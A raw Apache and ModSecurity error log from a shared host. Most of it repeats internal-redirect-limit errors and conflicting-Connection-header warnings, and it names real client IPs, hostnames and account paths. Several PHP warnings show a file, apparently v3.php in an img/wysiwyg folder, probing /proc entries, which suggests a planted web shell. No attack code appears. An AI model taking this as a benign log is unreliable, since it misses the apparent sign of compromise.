[Tue May 12 01:11:28.666747 2026] [core:error] [pid 1695975:tid 1695990] [client 4.193.137.131:1124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:28.666779 2026] [core:error] [pid 1695975:tid 1695990] [client 4.193.137.131:1124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:29.151890 2026] [core:error] [pid 1707624:tid 1707700] [client 4.193.137.131:1125] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:29.151921 2026] [core:error] [pid 1707624:tid 1707700] [client 4.193.137.131:1125] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:29.632069 2026] [core:error] [pid 1695975:tid 1695999] [client 4.193.137.131:1103] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:29.632101 2026] [core:error] [pid 1695975:tid 1695999] [client 4.193.137.131:1103] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:30.110931 2026] [core:error] [pid 1709071:tid 1709106] [client 4.193.137.131:1355] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:30.110977 2026] [core:error] [pid 1709071:tid 1709106] [client 4.193.137.131:1355] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:30.590297 2026] [core:error] [pid 1691274:tid 1691292] [client 4.193.137.131:1143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:30.590340 2026] [core:error] [pid 1691274:tid 1691292] [client 4.193.137.131:1143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:31.109371 2026] [core:error] [pid 1709071:tid 1709096] [client 4.193.137.131:1225] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:31.109398 2026] [core:error] [pid 1709071:tid 1709096] [client 4.193.137.131:1225] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:31.593116 2026] [core:error] [pid 1691274:tid 1691294] [client 4.193.137.131:1112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:31.593153 2026] [core:error] [pid 1691274:tid 1691294] [client 4.193.137.131:1112] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:32.106101 2026] [core:error] [pid 1691274:tid 1691281] [client 4.193.137.131:1116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:32.106128 2026] [core:error] [pid 1691274:tid 1691281] [client 4.193.137.131:1116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:32.583783 2026] [core:error] [pid 1709071:tid 1709099] [client 4.193.137.131:1130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:32.583807 2026] [core:error] [pid 1709071:tid 1709099] [client 4.193.137.131:1130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:33.117168 2026] [core:error] [pid 1630927:tid 1630947] [client 4.193.137.131:1139] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:33.117197 2026] [core:error] [pid 1630927:tid 1630947] [client 4.193.137.131:1139] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:33.488925 2026] [security2:error] [pid 1709071:tid 1709108] [client 43.166.240.231:43506] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/"] [unique_id "agJiJbvMumyrWMfSu7qMagAAANU"]
[Tue May 12 01:11:33.665951 2026] [core:error] [pid 1695975:tid 1695991] [client 4.193.137.131:1384] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:33.665976 2026] [core:error] [pid 1695975:tid 1695991] [client 4.193.137.131:1384] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:34.156520 2026] [core:error] [pid 1695975:tid 1695984] [client 4.193.137.131:1098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:34.156557 2026] [core:error] [pid 1695975:tid 1695984] [client 4.193.137.131:1098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:34.635189 2026] [core:error] [pid 1707624:tid 1707682] [client 4.193.137.131:1109] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:34.635213 2026] [core:error] [pid 1707624:tid 1707682] [client 4.193.137.131:1109] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:35.152916 2026] [core:error] [pid 1695975:tid 1695992] [client 4.193.137.131:1097] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:35.152944 2026] [core:error] [pid 1695975:tid 1695992] [client 4.193.137.131:1097] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:35.638120 2026] [core:error] [pid 1630927:tid 1630943] [client 4.193.137.131:1356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:35.638147 2026] [core:error] [pid 1630927:tid 1630943] [client 4.193.137.131:1356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:36.170658 2026] [core:error] [pid 1691274:tid 1691299] [client 4.193.137.131:1108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:36.170685 2026] [core:error] [pid 1691274:tid 1691299] [client 4.193.137.131:1108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:36.576373 2026] [security2:error] [pid 1630927:tid 1630934] [client 43.166.240.231:46474] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "homin.fr"] [uri "/fr/"] [unique_id "agJiKGiGYYhUwDaJINnI2QAAAUQ"], referer: http://homin.fr
[Tue May 12 01:11:36.692636 2026] [core:error] [pid 1709071:tid 1709097] [client 4.193.137.131:1111] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:36.692662 2026] [core:error] [pid 1709071:tid 1709097] [client 4.193.137.131:1111] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:37.171165 2026] [core:error] [pid 1691274:tid 1691490] [client 4.193.137.131:1118] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:37.171233 2026] [core:error] [pid 1691274:tid 1691490] [client 4.193.137.131:1118] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:37.656062 2026] [core:error] [pid 1709071:tid 1709105] [client 4.193.137.131:1144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:37.656094 2026] [core:error] [pid 1709071:tid 1709105] [client 4.193.137.131:1144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:38.143685 2026] [core:error] [pid 1695975:tid 1695995] [client 4.193.137.131:1124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:38.143723 2026] [core:error] [pid 1695975:tid 1695995] [client 4.193.137.131:1124] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:38.664033 2026] [core:error] [pid 1707624:tid 1707706] [client 4.193.137.131:1122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:38.664072 2026] [core:error] [pid 1707624:tid 1707706] [client 4.193.137.131:1122] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:39.175553 2026] [core:error] [pid 1695975:tid 1695993] [client 4.193.137.131:1117] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:39.175592 2026] [core:error] [pid 1695975:tid 1695993] [client 4.193.137.131:1117] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:39.720663 2026] [core:error] [pid 1707624:tid 1707702] [client 4.193.137.131:1129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:39.720705 2026] [core:error] [pid 1707624:tid 1707702] [client 4.193.137.131:1129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:40.213872 2026] [core:error] [pid 1695975:tid 1695981] [client 4.193.137.131:1131] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:40.213900 2026] [core:error] [pid 1695975:tid 1695981] [client 4.193.137.131:1131] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:40.732617 2026] [core:error] [pid 1630927:tid 1630933] [client 4.193.137.131:1115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:40.732645 2026] [core:error] [pid 1630927:tid 1630933] [client 4.193.137.131:1115] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:41.212531 2026] [core:error] [pid 1691274:tid 1691287] [client 4.193.137.131:1140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:41.212557 2026] [core:error] [pid 1691274:tid 1691287] [client 4.193.137.131:1140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:41.702162 2026] [core:error] [pid 1707624:tid 1707694] [client 4.193.137.131:1121] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:41.702188 2026] [core:error] [pid 1707624:tid 1707694] [client 4.193.137.131:1121] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:42.177875 2026] [core:error] [pid 1691274:tid 1691285] [client 4.193.137.131:1096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:42.177906 2026] [core:error] [pid 1691274:tid 1691285] [client 4.193.137.131:1096] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:42.668157 2026] [core:error] [pid 1630927:tid 1630932] [client 4.193.137.131:1246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:42.668192 2026] [core:error] [pid 1630927:tid 1630932] [client 4.193.137.131:1246] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:43.174619 2026] [core:error] [pid 1695975:tid 1695979] [client 4.193.137.131:1749] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:43.174644 2026] [core:error] [pid 1695975:tid 1695979] [client 4.193.137.131:1749] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:43.657691 2026] [core:error] [pid 1707624:tid 1707683] [client 4.193.137.131:1395] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:43.657727 2026] [core:error] [pid 1707624:tid 1707683] [client 4.193.137.131:1395] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:44.207450 2026] [core:error] [pid 1709071:tid 1709090] [client 4.193.137.131:1347] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:44.207485 2026] [core:error] [pid 1709071:tid 1709090] [client 4.193.137.131:1347] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:44.685027 2026] [core:error] [pid 1695975:tid 1695988] [client 4.193.137.131:1114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:44.685052 2026] [core:error] [pid 1695975:tid 1695988] [client 4.193.137.131:1114] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:45.160200 2026] [core:error] [pid 1707624:tid 1707701] [client 4.193.137.131:1345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:45.160255 2026] [core:error] [pid 1707624:tid 1707701] [client 4.193.137.131:1345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:45.648519 2026] [core:error] [pid 1695975:tid 1695998] [client 4.193.137.131:1109] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:45.648547 2026] [core:error] [pid 1695975:tid 1695998] [client 4.193.137.131:1109] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:46.127390 2026] [core:error] [pid 1707624:tid 1707698] [client 4.193.137.131:1143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:46.127421 2026] [core:error] [pid 1707624:tid 1707698] [client 4.193.137.131:1143] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:46.659147 2026] [core:error] [pid 1630927:tid 1630946] [client 4.193.137.131:1358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:46.659174 2026] [core:error] [pid 1630927:tid 1630946] [client 4.193.137.131:1358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:47.146240 2026] [core:error] [pid 1707624:tid 1707695] [client 4.193.137.131:1130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:47.146278 2026] [core:error] [pid 1707624:tid 1707695] [client 4.193.137.131:1130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:47.622672 2026] [core:error] [pid 1709071:tid 1709109] [client 4.193.137.131:1346] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:47.622707 2026] [core:error] [pid 1709071:tid 1709109] [client 4.193.137.131:1346] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:48.099799 2026] [core:error] [pid 1691274:tid 1691637] [client 4.193.137.131:1755] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:48.099843 2026] [core:error] [pid 1691274:tid 1691637] [client 4.193.137.131:1755] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:48.577960 2026] [core:error] [pid 1709071:tid 1709093] [client 4.193.137.131:1098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:48.577987 2026] [core:error] [pid 1709071:tid 1709093] [client 4.193.137.131:1098] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:49.052711 2026] [core:error] [pid 1691274:tid 1691286] [client 4.193.137.131:1376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:49.052744 2026] [core:error] [pid 1691274:tid 1691286] [client 4.193.137.131:1376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:49.549515 2026] [core:error] [pid 1695975:tid 1695994] [client 4.193.137.131:1132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:49.549553 2026] [core:error] [pid 1695975:tid 1695994] [client 4.193.137.131:1132] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:50.061220 2026] [core:error] [pid 1707624:tid 1707703] [client 4.193.137.131:1140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:50.061256 2026] [core:error] [pid 1707624:tid 1707703] [client 4.193.137.131:1140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:50.558588 2026] [core:error] [pid 1709071:tid 1709087] [client 4.193.137.131:1137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:50.558633 2026] [core:error] [pid 1709071:tid 1709087] [client 4.193.137.131:1137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:51.044815 2026] [core:error] [pid 1707624:tid 1707696] [client 4.193.137.131:1382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:51.044851 2026] [core:error] [pid 1707624:tid 1707696] [client 4.193.137.131:1382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1022/task/1092/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1092/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1022/task/1092/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1092/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1022/task/1092/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1092/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:11:51.508642 2026] [security2:error] [pid 1695975:tid 1696001] [client 170.106.84.136:41598] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJiN9VI9ymHBxup749vdgAAAJc"]
[Tue May 12 01:11:51.548698 2026] [core:error] [pid 1695975:tid 1695999] [client 4.193.137.131:1091] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:51.548725 2026] [core:error] [pid 1695975:tid 1695999] [client 4.193.137.131:1091] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:52.112037 2026] [core:error] [pid 1707624:tid 1707700] [client 4.193.137.131:1095] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:52.112064 2026] [core:error] [pid 1707624:tid 1707700] [client 4.193.137.131:1095] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:52.601693 2026] [core:error] [pid 1691274:tid 1691293] [client 4.193.137.131:1350] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:52.601730 2026] [core:error] [pid 1691274:tid 1691293] [client 4.193.137.131:1350] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:53.150000 2026] [core:error] [pid 1695975:tid 1695987] [client 4.193.137.131:1225] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:53.150035 2026] [core:error] [pid 1695975:tid 1695987] [client 4.193.137.131:1225] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
